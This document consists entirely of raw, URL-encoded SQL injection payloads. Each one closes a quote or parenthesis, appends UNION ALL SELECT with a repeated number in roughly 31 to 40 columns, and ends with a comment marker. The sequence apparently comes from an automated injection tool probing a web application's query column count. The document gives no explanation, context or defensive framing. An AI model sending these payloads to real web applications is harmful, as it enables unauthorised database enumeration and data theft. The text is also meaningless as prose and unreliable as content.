-8995%27%29%20UNION%20ALL%20SELECT%203909%2C3909%2C3909%2C3909%2C3909%2C3909%2C3909%2C3909%2C3909%2C3909%2C3909%2C3909%2C3909%2C3909%2C3909%2C3909%2C3909%2C3909%2C3909%2C3909%2C3909%2C3909%2C3909%2C3909%2C3909%2C3909%2C3909%2C3909%2C3909%2C3909%2C3909%2C3909%2C3909%2C3909%2C3909%2C3909--%20 -7482%27%29%20UNION%20ALL%20SELECT%205183%2C5183%2C5183%2C5183%2C5183%2C5183%2C5183%2C5183%2C5183%2C5183%2C5183%2C5183%2C5183%2C5183%2C5183%2C5183%2C5183%2C5183%2C5183%2C5183%2C5183%2C5183%2C5183%2C5183%2C5183%2C5183%2C5183%2C5183%2C5183%2C5183%2C5183%2C5183%2C5183%2C5183%2C5183%2C5183%2C5183--%20 -2849%27%29%20UNION%20ALL%20SELECT%201107%2C1107%2C1107%2C1107%2C1107%2C1107%2C1107%2C1107%2C1107%2C1107%2C1107%2C1107%2C1107%2C1107%2C1107%2C1107%2C1107%2C1107%2C1107%2C1107%2C1107%2C1107%2C1107%2C1107%2C1107%2C1107%2C1107%2C1107%2C1107%2C1107%2C1107%2C1107%2C1107%2C1107%2C1107%2C1107%2C1107%2C1107--%20 -4022%27%29%20UNION%20ALL%20SELECT%207160%2C7160%2C7160%2C7160%2C7160%2C7160%2C7160%2C7160%2C7160%2C7160%2C7160%2C7160%2C7160%2C7160%2C7160%2C7160%2C7160%2C7160%2C7160%2C7160%2C7160%2C7160%2C7160%2C7160%2C7160%2C7160%2C7160%2C7160%2C7160%2C7160%2C7160%2C7160%2C7160%2C7160%2C7160%2C7160%2C7160%2C7160%2C7160--%20 -9854%27%29%20UNION%20ALL%20SELECT%206517%2C6517%2C6517%2C6517%2C6517%2C6517%2C6517%2C6517%2C6517%2C6517%2C6517%2C6517%2C6517%2C6517%2C6517%2C6517%2C6517%2C6517%2C6517%2C6517%2C6517%2C6517%2C6517%2C6517%2C6517%2C6517%2C6517%2C6517%2C6517%2C6517%2C6517%2C6517%2C6517%2C6517%2C6517%2C6517%2C6517%2C6517%2C6517%2C6517--%20 -8530%27%20UNION%20ALL%20SELECT%202313%2C2313%2C2313%2C2313%2C2313%2C2313%2C2313%2C2313%2C2313%2C2313%2C2313%2C2313%2C2313%2C2313%2C2313%2C2313%2C2313%2C2313%2C2313%2C2313%2C2313%2C2313%2C2313%2C2313%2C2313%2C2313%2C2313%2C2313%2C2313%2C2313%2C2313--%20 -6099%27%20UNION%20ALL%20SELECT%207362%2C7362%2C7362%2C7362%2C7362%2C7362%2C7362%2C7362%2C7362%2C7362%2C7362%2C7362%2C7362%2C7362%2C7362%2C7362%2C7362%2C7362%2C7362%2C7362%2C7362%2C7362%2C7362%2C7362%2C7362%2C7362%2C7362%2C7362%2C7362%2C7362%2C7362%2C7362--%20 -9351%27%20UNION%20ALL%20SELECT%207086%2C7086%2C7086%2C7086%2C7086%2C7086%2C7086%2C7086%2C7086%2C7086%2C7086%2C7086%2C7086%2C7086%2C7086%2C7086%2C7086%2C7086%2C7086%2C7086%2C7086%2C7086%2C7086%2C7086%2C7086%2C7086%2C7086%2C7086%2C7086%2C7086%2C7086%2C7086%2C7086--%20 -4894%27%20UNION%20ALL%20SELECT%206778%2C6778%2C6778%2C6778%2C6778%2C6778%2C6778%2C6778%2C6778%2C6778%2C6778%2C6778%2C6778%2C6778%2C6778%2C6778%2C6778%2C6778%2C6778%2C6778%2C6778%2C6778%2C6778%2C6778%2C6778%2C6778%2C6778%2C6778%2C6778%2C6778%2C6778%2C6778%2C6778%2C6778--%20 -3409%27%20UNION%20ALL%20SELECT%205299%2C5299%2C5299%2C5299%2C5299%2C5299%2C5299%2C5299%2C5299%2C5299%2C5299%2C5299%2C5299%2C5299%2C5299%2C5299%2C5299%2C5299%2C5299%2C5299%2C5299%2C5299%2C5299%2C5299%2C5299%2C5299%2C5299%2C5299%2C5299%2C5299%2C5299%2C5299%2C5299%2C5299%2C5299--%20 -8576%27%20UNION%20ALL%20SELECT%206102%2C6102%2C6102%2C6102%2C6102%2C6102%2C6102%2C6102%2C6102%2C6102%2C6102%2C6102%2C6102%2C6102%2C6102%2C6102%2C6102%2C6102%2C6102%2C6102%2C6102%2C6102%2C6102%2C6102%2C6102%2C6102%2C6102%2C6102%2C6102%2C6102%2C6102%2C6102%2C6102%2C6102%2C6102%2C6102--%20 -6832%27%20UNION%20ALL%20SELECT%208647%2C8647%2C8647%2C8647%2C8647%2C8647%2C8647%2C8647%2C8647%2C8647%2C8647%2C8647%2C8647%2C8647%2C8647%2C8647%2C8647%2C8647%2C8647%2C8647%2C8647%2C8647%2C8647%2C8647%2C8647%2C8647%2C8647%2C8647%2C8647%2C8647%2C8647%2C8647%2C8647%2C8647%2C8647%2C8647%2C8647--%20 -7723%27%20UNION%20ALL%20SELECT%203604%2C3604%2C3604%2C3604%2C3604%2C3604%2C3604%2C3604%2C3604%2C3604%2C3604%2C3604%2C3604%2C3604%2C3604%2C3604%2C3604%2C3604%2C3604%2C3604%2C3604%2C3604%2C3604%2C3604%2C3604%2C3604%2C3604%2C3604%2C3604%2C3604%2C3604%2C3604%2C3604%2C3604%2C3604%2C3604%2C3604%2C3604--%20 -4938%27%20UNION%20ALL%20SELECT%206779%2C6779%2C6779%2C6779%2C6779%2C6779%2C6779%2C6779%2C6779%2C6779%2C6779%2C6779%2C6779%2C6779%2C6779%2C6779%2C6779%2C6779%2C6779%2C6779%2C6779%2C6779%2C6779%2C6779%2C6779%2C6779%2C6779%2C6779%2C6779%2C6779%2C6779%2C6779%2C6779%2C6779%2C6779%2C6779%2C6779%2C6779%2C6779--%20 -5685%27%20UNION%20ALL%20SELECT%204788%2C4788%2C4788%2C4788%2C4788%2C4788%2C4788%2C4788%2C4788%2C4788%2C4788%2C4788%2C4788%2C4788%2C4788%2C4788%2C4788%2C4788%2C4788%2C4788%2C4788%2C4788%2C4788%2C4788%2C4788%2C4788%2C4788%2C4788%2C4788%2C4788%2C4788%2C4788%2C4788%2C4788%2C4788%2C4788%2C4788%2C4788%2C4788%2C4788--%20 -3502%22%20UNION%20ALL%20SELECT%205073%2C5073%2C5073%2C5073%2C5073%2C5073%2C5073%2C5073%2C5073%2C5073%2C5073%2C5073%2C5073%2C5073%2C5073%2C5073%2C5073%2C5073%2C5073%2C5073%2C5073%2C5073%2C5073%2C5073%2C5073%2C5073%2C5073%2C5073%2C5073%2C5073%2C5073--%20 -8292%22%20UNION%20ALL%20SELECT%207893%2C7893%2C7893%2C7893%2C7893%2C7893%2C7893%2C7893%2C7893%2C7893%2C7893%2C7893%2C7893%2C7893%2C7893%2C7893%2C7893%2C7893%2C7893%2C7893%2C7893%2C7893%2C7893%2C7893%2C7893%2C7893%2C7893%2C7893%2C7893%2C7893%2C7893%2C7893--%20 -6622%22%20UNION%20ALL%20SELECT%204962%2C4962%2C4962%2C4962%2C4962%2C4962%2C4962%2C4962%2C4962%2C4962%2C4962%2C4962%2C4962%2C4962%2C4962%2C4962%2C4962%2C4962%2C4962%2C4962%2C4962%2C4962%2C4962%2C4962%2C4962%2C4962%2C4962%2C4962%2C4962%2C4962%2C4962%2C4962%2C4962--%20 -2774%22%20UNION%20ALL%20SELECT%202420%2C2420%2C2420%2C2420%2C2420%2C2420%2C2420%2C2420%2C2420%2C2420%2C2420%2C2420%2C2420%2C2420%2C2420%2C2420%2C2420%2C2420%2C2420%2C2420%2C2420%2C2420%2C2420%2C2420%2C2420%2C2420%2C2420%2C2420%2C2420%2C2420%2C2420%2C2420%2C2420%2C2420--%20 -4352%22%20UNION%20ALL%20SELECT%201747%2C1747%2C1747%2C1747%2C1747%2C1747%2C1747%2C1747%2C1747%2C1747%2C1747%2C1747%2C1747%2C1747%2C1747%2C1747%2C1747%2C1747%2C1747%2C1747%2C1747%2C1747%2C1747%2C1747%2C1747%2C1747%2C1747%2C1747%2C1747%2C1747%2C1747%2C1747%2C1747%2C1747%2C1747--%20 -2432%22%20UNION%20ALL%20SELECT%209155%2C9155%2C9155%2C9155%2C9155%2C9155%2C9155%2C9155%2C9155%2C9155%2C9155%2C9155%2C9155%2C9155%2C9155%2C9155%2C9155%2C9155%2C9155%2C9155%2C9155%2C9155%2C9155%2C9155%2C9155%2C9155%2C9155%2C9155%2C9155%2C9155%2C9155%2C9155%2C9155%2C9155%2C9155%2C9155--%20 -9390%22%20UNION%20ALL%20SELECT%206686%2C6686%2C6686%2C6686%2C6686%2C6686%2C6686%2C6686%2C6686%2C6686%2C6686%2C6686%2C6686%2C6686%2C6686%2C6686%2C6686%2C6686%2C6686%2C6686%2C6686%2C6686%2C6686%2C6686%2C6686%2C6686%2C6686%2C6686%2C6686%2C6686%2C6686%2C6686%2C6686%2C6686%2C6686%2C6686%2C6686--%20 -6704%22%20UNION%20ALL%20SELECT%206475%2C6475%2C6475%2C6475%2C6475%2C6475%2C6475%2C6475%2C6475%2C6475%2C6475%2C6475%2C6475%2C6475%2C6475%2C6475%2C6475%2C6475%2C6475%2C6475%2C6475%2C6475%2C6475%2C6475%2C6475%2C6475%2C6475%2C6475%2C6475%2C6475%2C6475%2C6475%2C6475%2C6475%2C6475%2C6475%2C6475%2C6475--%20 -4244%22%20UNION%20ALL%20SELECT%209287%2C9287%2C9287%2C9287%2C9287%2C9287%2C9287%2C9287%2C9287%2C9287%2C9287%2C9287%2C9287%2C9287%2C9287%2C9287%2C9287%2C9287%2C9287%2C9287%2C9287%2C9287%2C9287%2C9287%2C9287%2C9287%2C9287%2C9287%2C9287%2C9287%2C9287%2C9287%2C9287%2C9287%2C9287%2C9287%2C9287%2C9287%2C9287--%20 -4452%22%20UNION%20ALL%20SELECT%209197%2C9197%2C9197%2C9197%2C9197%2C9197%2C9197%2C9197%2C9197%2C9197%2C9197%2C9197%2C9197%2C9197%2C9197%2C9197%2C9197%2C9197%2C9197%2C9197%2C9197%2C9197%2C9197%2C9197%2C9197%2C9197%2C9197%2C9197%2C9197%2C9197%2C9197%2C9197%2C9197%2C9197%2C9197%2C9197%2C9197%2C9197%2C9197%2C9197--%20 -5074%27%29%20UNION%20ALL%20SELECT%208906%2C8906%2C8906%2C8906%2C8906%2C8906%2C8906%2C8906%2C8906%2C8906%2C8906%2C8906%2C8906%2C8906%2C8906%2C8906%2C8906%2C8906%2C8906%2C8906%2C8906%2C8906%2C8906%2C8906%2C8906%2C8906%2C8906%2C8906%2C8906%2C8906%2C8906--%20 -3266%27%29%20UNION%20ALL%20SELECT%201640%2C1640%2C1640%2C1640%2C1640%2C1640%2C1640%2C1640%2C1640%2C1640%2C1640%2C1640%2C1640%2C1640%2C1640%2C1640%2C1640%2C1640%2C1640%2C1640%2C1640%2C1640%2C1640%2C1640%2C1640%2C1640%2C1640%2C1640%2C1640%2C1640%2C1640%2C1640--%20 -9604%27%29%20UNION%20ALL%20SELECT%203145%2C3145%2C3145%2C3145%2C3145%2C3145%2C3145%2C3145%2C3145%2C3145%2C3145%2C3145%2C3145%2C3145%2C3145%2C3145%2C3145%2C3145%2C3145%2C3145%2C3145%2C3145%2C3145%2C3145%2C3145%2C3145%2C3145%2C3145%2C3145%2C3145%2C3145%2C3145%2C3145--%20 -3350%27%29%20UNION%20ALL%20SELECT%202452%2C2452%2C2452%2C2452%2C2452%2C2452%2C2452%2C2452%2C2452%2C2452%2C2452%2C2452%2C2452%2C2452%2C2452%2C2452%2C2452%2C2452%2C2452%2C2452%2C2452%2C2452%2C2452%2C2452%2C2452%2C2452%2C2452%2C2452%2C2452%2C2452%2C2452%2C2452%2C2452%2C2452--%20 -5546%27%29%20UNION%20ALL%20SELECT%209451%2C9451%2C9451%2C9451%2C9451%2C9451%2C9451%2C9451%2C9451%2C9451%2C9451%2C9451%2C9451%2C9451%2C9451%2C9451%2C9451%2C9451%2C9451%2C9451%2C9451%2C9451%2C9451%2C9451%2C9451%2C9451%2C9451%2C9451%2C9451%2C9451%2C9451%2C9451%2C9451%2C9451%2C9451--%20 -2750%27%29%20UNION%20ALL%20SELECT%205375%2C5375%2C5375%2C5375%2C5375%2C5375%2C5375%2C5375%2C5375%2C5375%2C5375%2C5375%2C5375%2C5375%2C5375%2C5375%2C5375%2C5375%2C5375%2C5375%2C5375%2C5375%2C5375%2C5375%2C5375%2C5375%2C5375%2C5375%2C5375%2C5375%2C5375%2C5375%2C5375%2C5375%2C5375%2C5375--%20 -5473%27%29%20UNION%20ALL%20SELECT%209768%2C9768%2C9768%2C9768%2C9768%2C9768%2C9768%2C9768%2C9768%2C9768%2C9768%2C9768%2C9768%2C9768%2C9768%2C9768%2C9768%2C9768%2C9768%2C9768%2C9768%2C9768%2C9768%2C9768%2C9768%2C9768%2C9768%2C9768%2C9768%2C9768%2C9768%2C9768%2C9768%2C9768%2C9768%2C9768%2C9768--%20 -7362%27%29%20UNION%20ALL%20SELECT%209866%2C9866%2C9866%2C9866%2C9866%2C9866%2C9866%2C9866%2C9866%2C9866%2C9866%2C9866%2C9866%2C9866%2C9866%2C9866%2C9866%2C9866%2C9866%2C9866%2C9866%2C9866%2C9866%2C9866%2C9866%2C9866%2C9866%2C9866%2C9866%2C9866%2C9866%2C9866%2C9866%2C9866%2C9866%2C9866%2C9866%2C9866--%20 -9483%27%29%20UNION%20ALL%20SELECT%209951%2C9951%2C9951%2C9951%2C9951%2C9951%2C9951%2C9951%2C9951%2C9951%2C9951%2C9951%2C9951%2C9951%2C9951%2C9951%2C9951%2C9951%2C9951%2C9951%2C9951%2C9951%2C9951%2C9951%2C9951%2C9951%2C9951%2C9951%2C9951%2C9951%2C9951%2C9951%2C9951%2C9951%2C9951%2C9951%2C9951%2C9951%2C9951--%20 -9576%27%29%20UNION%20ALL%20SELECT%206614%2C6614%2C6614%2C6614%2C6614%2C6614%2C6614%2C6614%2C6614%2C6614%2C6614%2C6614%2C6614%2C6614%2C6614%2C6614%2C6614%2C6614%2C6614%2C6614%2C6614%2C6614%2C6614%2C6614%2C6614%2C6614%2C6614%2C6614%2C6614%2C6614%2C6614%2C6614%2C6614%2C6614%2C6614%2C6614%2C6614%2C6614%2C6614%2C6614--%20 -5190%27%29%29%20UNION%20ALL%20SELECT%202807%2C2807%2C2807%2C2807%2C2807%2C2807%2C2807%2C2807%2C2807%2C2807%2C2807%2C2807%2C2807%2C2807%2C2807%2C2807%2C2807%2C2807%2C2807%2C2807%2C2807%2C2807%2C2807%2C2807%2C2807%2C2807%2C2807%2C2807%2C2807%2C2807%2C2807--%20 -8279%27%29%29%20UNION%20ALL%20SELECT%208288%2C8288%2C8288%2C8288%2C8288%2C8288%2C8288%2C8288%2C8288%2C8288%2C8288%2C8288%2C8288%2C8288%2C8288%2C8288%2C8288%2C8288%2C8288%2C8288%2C8288%2C8288%2C8288%2C8288%2C8288%2C8288%2C8288%2C8288%2C8288%2C8288%2C8288%2C8288--%20 -3239%27%29%29%20UNION%20ALL%20SELECT%202797%2C2797%2C2797%2C2797%2C2797%2C2797%2C2797%2C2797%2C2797%2C2797%2C2797%2C2797%2C2797%2C2797%2C2797%2C2797%2C2797%2C2797%2C2797%2C2797%2C2797%2C2797%2C2797%2C2797%2C2797%2C2797%2C2797%2C2797%2C2797%2C2797%2C2797%2C2797%2C2797--%20 -2945%27%29%29%20UNION%20ALL%20SELECT%201999%2C1999%2C1999%2C1999%2C1999%2C1999%2C1999%2C1999%2C1999%2C1999%2C1999%2C1999%2C1999%2C1999%2C1999%2C1999%2C1999%2C1999%2C1999%2C1999%2C1999%2C1999%2C1999%2C1999%2C1999%2C1999%2C1999%2C1999%2C1999%2C1999%2C1999%2C1999%2C1999%2C1999--%20 -3509%27%29%29%20UNION%20ALL%20SELECT%202693%2C2693%2C2693%2C2693%2C2693%2C2693%2C2693%2C2693%2C2693%2C2693%2C2693%2C2693%2C2693%2C2693%2C2693%2C2693%2C2693%2C2693%2C2693%2C2693%2C2693%2C2693%2C2693%2C2693%2C2693%2C2693%2C2693%2C2693%2C2693%2C2693%2C2693%2C2693%2C2693%2C2693%2C2693--%20 -2706%27%29%29%20UNION%20ALL%20SELECT%209257%2C9257%2C9257%2C9257%2C9257%2C9257%2C9257%2C9257%2C9257%2C9257%2C9257%2C9257%2C9257%2C9257%2C9257%2C9257%2C9257%2C9257%2C9257%2C9257%2C9257%2C9257%2C9257%2C9257%2C9257%2C9257%2C9257%2C9257%2C9257%2C9257%2C9257%2C9257%2C9257%2C9257%2C9257%2C9257--%20 -6559%27%29%29%20UNION%20ALL%20SELECT%201799%2C1799%2C1799%2C1799%2C1799%2C1799%2C1799%2C1799%2C1799%2C1799%2C1799%2C1799%2C1799%2C1799%2C1799%2C1799%2C1799%2C1799%2C1799%2C1799%2C1799%2C1799%2C1799%2C1799%2C1799%2C1799%2C1799%2C1799%2C1799%2C1799%2C1799%2C1799%2C1799%2C1799%2C1799%2C1799%2C1799--%20 -3122%27%29%29%20UNION%20ALL%20SELECT%204947%2C4947%2C4947%2C4947%2C4947%2C4947%2C4947%2C4947%2C4947%2C4947%2C4947%2C4947%2C4947%2C4947%2C4947%2C4947%2C4947%2C4947%2C4947%2C4947%2C4947%2C4947%2C4947%2C4947%2C4947%2C4947%2C4947%2C4947%2C4947%2C4947%2C4947%2C4947%2C4947%2C4947%2C4947%2C4947%2C4947%2C4947--%20 -1405%27%29%29%20UNION%20ALL%20SELECT%204952%2C4952%2C4952%2C4952%2C4952%2C4952%2C4952%2C4952%2C4952%2C4952%2C4952%2C4952%2C4952%2C4952%2C4952%2C4952%2C4952%2C4952%2C4952%2C4952%2C4952%2C4952%2C4952%2C4952%2C4952%2C4952%2C4952%2C4952%2C4952%2C4952%2C4952%2C4952%2C4952%2C4952%2C4952%2C4952%2C4952%2C4952%2C4952--%20 -9746%27%29%29%20UNION%20ALL%20SELECT%204308%2C4308%2C4308%2C4308%2C4308%2C4308%2C4308%2C4308%2C4308%2C4308%2C4308%2C4308%2C4308%2C4308%2C4308%2C4308%2C4308%2C4308%2C4308%2C4308%2C4308%2C4308%2C4308%2C4308%2C4308%2C4308%2C4308%2C4308%2C4308%2C4308%2C4308%2C4308%2C4308%2C4308%2C4308%2C4308%2C4308%2C4308%2C4308%2C4308--%20 -9379%27%29%29%29%20UNION%20ALL%20SELECT%203160%2C3160%2C3160%2C3160%2C3160%2C3160%2C3160%2C3160%2C3160%2C3160%2C3160%2C3160%2C3160%2C3160%2C3160%2C3160%2C3160%2C3160%2C3160%2C3160%2C3160%2C3160%2C3160%2C3160%2C3160%2C3160%2C3160%2C3160%2C3160%2C3160%2C3160--%20 -5756%27%29%29%29%20UNION%20ALL%20SELECT%207261%2C7261%2C7261%2C7261%2C7261%2C7261%2C7261%2C7261%2C7261%2C7261%2C7261%2C7261%2C7261%2C7261%2C7261%2C7261%2C7261%2C7261%2C7261%2C7261%2C7261%2C7261%2C7261%2C7261%2C7261%2C7261%2C7261%2C7261%2C7261%2C7261%2C7261%2C7261--%20 -9409%27%29%29%29%20UNION%20ALL%20SELECT%205838%2C5838%2C5838%2C5838%2C5838%2C5838%2C5838%2C5838%2C5838%2C5838%2C5838%2C5838%2C5838%2C5838%2C5838%2C5838%2C5838%2C5838%2C5838%2C5838%2C5838%2C5838%2C5838%2C5838%2C5838%2C5838%2C5838%2C5838%2C5838%2C5838%2C5838%2C5838%2C5838--%20 -6017%27%29%29%29%20UNION%20ALL%20SELECT%201492%2C1492%2C1492%2C1492%2C1492%2C1492%2C1492%2C1492%2C1492%2C1492%2C1492%2C1492%2C1492%2C1492%2C1492%2C1492%2C1492%2C1492%2C1492%2C1492%2C1492%2C1492%2C1492%2C1492%2C1492%2C1492%2C1492%2C1492%2C1492%2C1492%2C1492%2C1492%2C1492%2C1492--%20 -3876%27%29%29%29%20UNION%20ALL%20SELECT%205916%2C5916%2C5916%2C5916%2C5916%2C5916%2C5916%2C5916%2C5916%2C5916%2C5916%2C5916%2C5916%2C5916%2C5916%2C5916%2C5916%2C5916%2C5916%2C5916%2C5916%2C5916%2C5916%2C5916%2C5916%2C5916%2C5916%2C5916%2C5916%2C5916%2C5916%2C5916%2C5916%2C5916%2C5916--%20 -8821%27%29%29%29%20UNION%20ALL%20SELECT%206528%2C6528%2C6528%2C6528%2C6528%2C6528%2C6528%2C6528%2C6528%2C6528%2C6528%2C6528%2C6528%2C6528%2C6528%2C6528%2C6528%2C6528%2C6528%2C6528%2C6528%2C6528%2C6528%2C6528%2C6528%2C6528%2C6528%2C6528%2C6528%2C6528%2C6528%2C6528%2C6528%2C6528%2C6528%2C6528--%20 -4616%27%29%29%29%20UNION%20ALL%20SELECT%201183%2C1183%2C1183%2C1183%2C1183%2C1183%2C1183%2C1183%2C1183%2C1183%2C1183%2C1183%2C1183%2C1183%2C1183%2C1183%2C1183%2C1183%2C1183%2C1183%2C1183%2C1183%2C1183%2C1183%2C1183%2C1183%2C1183%2C1183%2C1183%2C1183%2C1183%2C1183%2C1183%2C1183%2C1183%2C1183%2C1183--%20 -8001%27%29%29%29%20UNION%20ALL%20SELECT%203897%2C3897%2C3897%2C3897%2C3897%2C3897%2C3897%2C3897%2C3897%2C3897%2C3897%2C3897%2C3897%2C3897%2C3897%2C3897%2C3897%2C3897%2C3897%2C3897%2C3897%2C3897%2C3897%2C3897%2C3897%2C3897%2C3897%2C3897%2C3897%2C3897%2C3897%2C3897%2C3897%2C3897%2C3897%2C3897%2C3897%2C3897--%20 -1048%27%29%29%29%20UNION%20ALL%20SELECT%203080%2C3080%2C3080%2C3080%2C3080%2C3080%2C3080%2C3080%2C3080%2C3080%2C3080%2C3080%2C3080%2C3080%2C3080%2C3080%2C3080%2C3080%2C3080%2C3080%2C3080%2C3080%2C3080%2C3080%2C3080%2C3080%2C3080%2C3080%2C3080%2C3080%2C3080%2C3080%2C3080%2C3080%2C3080%2C3080%2C3080%2C3080%2C3080--%20 -8114%27%29%29%29%20UNION%20ALL%20SELECT%202342%2C2342%2C2342%2C2342%2C2342%2C2342%2C2342%2C2342%2C2342%2C2342%2C2342%2C2342%2C2342%2C2342%2C2342%2C2342%2C2342%2C2342%2C2342%2C2342%2C2342%2C2342%2C2342%2C2342%2C2342%2C2342%2C2342%2C2342%2C2342%2C2342%2C2342%2C2342%2C2342%2C2342%2C2342%2C2342%2C2342%2C2342%2C2342%2C2342--%20 -3448%27%20UNION%20ALL%20SELECT%208674%2C8674%2C8674%2C8674%2C8674%2C8674%2C8674%2C8674%2C8674%2C8674%2C8674%2C8674%2C8674%2C8674%2C8674%2C8674%2C8674%2C8674%2C8674%2C8674%2C8674%2C8674%2C8674%2C8674%2C8674%2C8674%2C8674%2C8674%2C8674%2C8674%2C8674--%20 -3094%27%20UNION%20ALL%20SELECT%206489%2C6489%2C6489%2C6489%2C6489%2C6489%2C6489%2C6489%2C6489%2C6489%2C6489%2C6489%2C6489%2C6489%2C6489%2C6489%2C6489%2C6489%2C6489%2C6489%2C6489%2C6489%2C6489%2C6489%2C6489%2C6489%2C6489%2C6489%2C6489%2C6489%2C6489%2C6489--%20 -7618%27%20UNION%20ALL%20SELECT%209657%2C9657%2C9657%2C9657%2C9657%2C9657%2C9657%2C9657%2C9657%2C9657%2C9657%2C9657%2C9657%2C9657%2C9657%2C9657%2C9657%2C9657%2C9657%2C9657%2C9657%2C9657%2C9657%2C9657%2C9657%2C9657%2C9657%2C9657%2C9657%2C9657%2C9657%2C9657%2C9657--%20 -6350%27%20UNION%20ALL%20SELECT%207820%2C7820%2C7820%2C7820%2C7820%2C7820%2C7820%2C7820%2C7820%2C7820%2C7820%2C7820%2C7820%2C7820%2C7820%2C7820%2C7820%2C7820%2C7820%2C7820%2C7820%2C7820%2C7820%2C7820%2C7820%2C7820%2C7820%2C7820%2C7820%2C7820%2C7820%2C7820%2C7820%2C7820--%20 -8508%27%20UNION%20ALL%20SELECT%207537%2C7537%2C7537%2C7537%2C7537%2C7537%2C7537%2C7537%2C7537%2C7537%2C7537%2C7537%2C7537%2C7537%2C7537%2C7537%2C7537%2C7537%2C7537%2C7537%2C7537%2C7537%2C7537%2C7537%2C7537%2C7537%2C7537%2C7537%2C7537%2C7537%2C7537%2C7537%2C7537%2C7537%2C7537--%20 -8289%27%20UNION%20ALL%20SELECT%204627%2C4627%2C4627%2C4627%2C4627%2C4627%2C4627%2C4627%2C4627%2C4627%2C4627%2C4627%2C4627%2C4627%2C4627%2C4627%2C4627%2C4627%2C4627%2C4627%2C4627%2C4627%2C4627%2C4627%2C4627%2C4627%2C4627%2C4627%2C4627%2C4627%2C4627%2C4627%2C4627%2C4627%2C4627%2C4627--%20 -7603%27%20UNION%20ALL%20SELECT%205958%2C5958%2C5958%2C5958%2C5958%2C5958%2C5958%2C5958%2C5958%2C5958%2C5958%2C5958%2C5958%2C5958%2C5958%2C5958%2C5958%2C5958%2C5958%2C5958%2C5958%2C5958%2C5958%2C5958%2C5958%2C5958%2C5958%2C5958%2C5958%2C5958%2C5958%2C5958%2C5958%2C5958%2C5958%2C5958%2C5958--%20 -8575%27%20UNION%20ALL%20SELECT%201779%2C1779%2C1779%2C1779%2C1779%2C1779%2C1779%2C1779%2C1779%2C1779%2C1779%2C1779%2C1779%2C1779%2C1779%2C1779%2C1779%2C1779%2C1779%2C1779%2C1779%2C1779%2C1779%2C1779%2C1779%2C1779%2C1779%2C1779%2C1779%2C1779%2C1779%2C1779%2C1779%2C1779%2C1779%2C1779%2C1779%2C1779--%20 -6391%27%20UNION%20ALL%20SELECT%201996%2C1996%2C1996%2C1996%2C1996%2C1996%2C1996%2C1996%2C1996%2C1996%2C1996%2C1996%2C1996%2C1996%2C1996%2C1996%2C1996%2C1996%2C1996%2C1996%2C1996%2C1996%2C1996%2C1996%2C1996%2C1996%2C1996%2C1996%2C1996%2C1996%2C1996%2C1996%2C1996%2C1996%2C1996%2C1996%2C1996%2C1996%2C1996--%20 -4095%27%20UNION%20ALL%20SELECT%206068%2C6068%2C6068%2C6068%2C6068%2C6068%2C6068%2C6068%2C6068%2C6068%2C6068%2C6068%2C6068%2C6068%2C6068%2C6068%2C6068%2C6068%2C6068%2C6068%2C6068%2C6068%2C6068%2C6068%2C6068%2C6068%2C6068%2C6068%2C6068%2C6068%2C6068%2C6068%2C6068%2C6068%2C6068%2C6068%2C6068%2C6068%2C6068%2C6068--%20 -3556%27%29%20UNION%20ALL%20SELECT%206433%2C6433%2C6433%2C6433%2C6433%2C6433%2C6433%2C6433%2C6433%2C6433%2C6433%2C6433%2C6433%2C6433%2C6433%2C6433%2C6433%2C6433%2C6433%2C6433%2C6433%2C6433%2C6433%2C6433%2C6433%2C6433%2C6433%2C6433%2C6433%2C6433%2C6433--%20 -1619%27%29%20UNION%20ALL%20SELECT%208064%2C8064%2C8064%2C8064%2C8064%2C8064%2C8064%2C8064%2C8064%2C8064%2C8064%2C8064%2C8064%2C8064%2C8064%2C8064%2C8064%2C8064%2C8064%2C8064%2C8064%2C8064%2C8064%2C8064%2C8064%2C8064%2C8064%2C8064%2C8064%2C8064%2C8064%2C8064--%20 -7038%27%29%20UNION%20ALL%20SELECT%202780%2C2780%2C2780%2C2780%2C2780%2C2780%2C2780%2C2780%2C2780%2C2780%2C2780%2C2780%2C2780%2C2780%2C2780%2C2780%2C2780%2C2780%2C2780%2C2780%2C2780%2C2780%2C2780%2C2780%2C2780%2C2780%2C2780%2C2780%2C2780%2C2780%2C2780%2C2780%2C2780--%20 -8462%27%29%20UNION%20ALL%20SELECT%206996%2C6996%2C6996%2C6996%2C6996%2C6996%2C6996%2C6996%2C6996%2C6996%2C6996%2C6996%2C6996%2C6996%2C6996%2C6996%2C6996%2C6996%2C6996%2C6996%2C6996%2C6996%2C6996%2C6996%2C6996%2C6996%2C6996%2C6996%2C6996%2C6996%2C6996%2C6996%2C6996%2C6996--%20 -1738%27%29%20UNION%20ALL%20SELECT%207798%2C7798%2C7798%2C7798%2C7798%2C7798%2C7798%2C7798%2C7798%2C7798%2C7798%2C7798%2C7798%2C7798%2C7798%2C7798%2C7798%2C7798%2C7798%2C7798%2C7798%2C7798%2C7798%2C7798%2C7798%2C7798%2C7798%2C7798%2C7798%2C7798%2C7798%2C7798%2C7798%2C7798%2C7798--%20 -5223%27%29%20UNION%20ALL%20SELECT%205164%2C5164%2C5164%2C5164%2C5164%2C5164%2C5164%2C5164%2C5164%2C5164%2C5164%2C5164%2C5164%2C5164%2C5164%2C5164%2C5164%2C5164%2C5164%2C5164%2C5164%2C5164%2C5164%2C5164%2C5164%2C5164%2C5164%2C5164%2C5164%2C5164%2C5164%2C5164%2C5164%2C5164%2C5164%2C5164--%20 -1260%27%29%20UNION%20ALL%20SELECT%204822%2C4822%2C4822%2C4822%2C4822%2C4822%2C4822%2C4822%2C4822%2C4822%2C4822%2C4822%2C4822%2C4822%2C4822%2C4822%2C4822%2C4822%2C4822%2C4822%2C4822%2C4822%2C4822%2C4822%2C4822%2C4822%2C4822%2C4822%2C4822%2C4822%2C4822%2C4822%2C4822%2C4822%2C4822%2C4822%2C4822--%20 -5400%27%29%20UNION%20ALL%20SELECT%203397%2C3397%2C3397%2C3397%2C3397%2C3397%2C3397%2C3397%2C3397%2C3397%2C3397%2C3397%2C3397%2C3397%2C3397%2C3397%2C3397%2C3397%2C3397%2C3397%2C3397%2C3397%2C3397%2C3397%2C3397%2C3397%2C3397%2C3397%2C3397%2C3397%2C3397%2C3397%2C3397%2C3397%2C3397%2C3397%2C3397%2C3397--%20 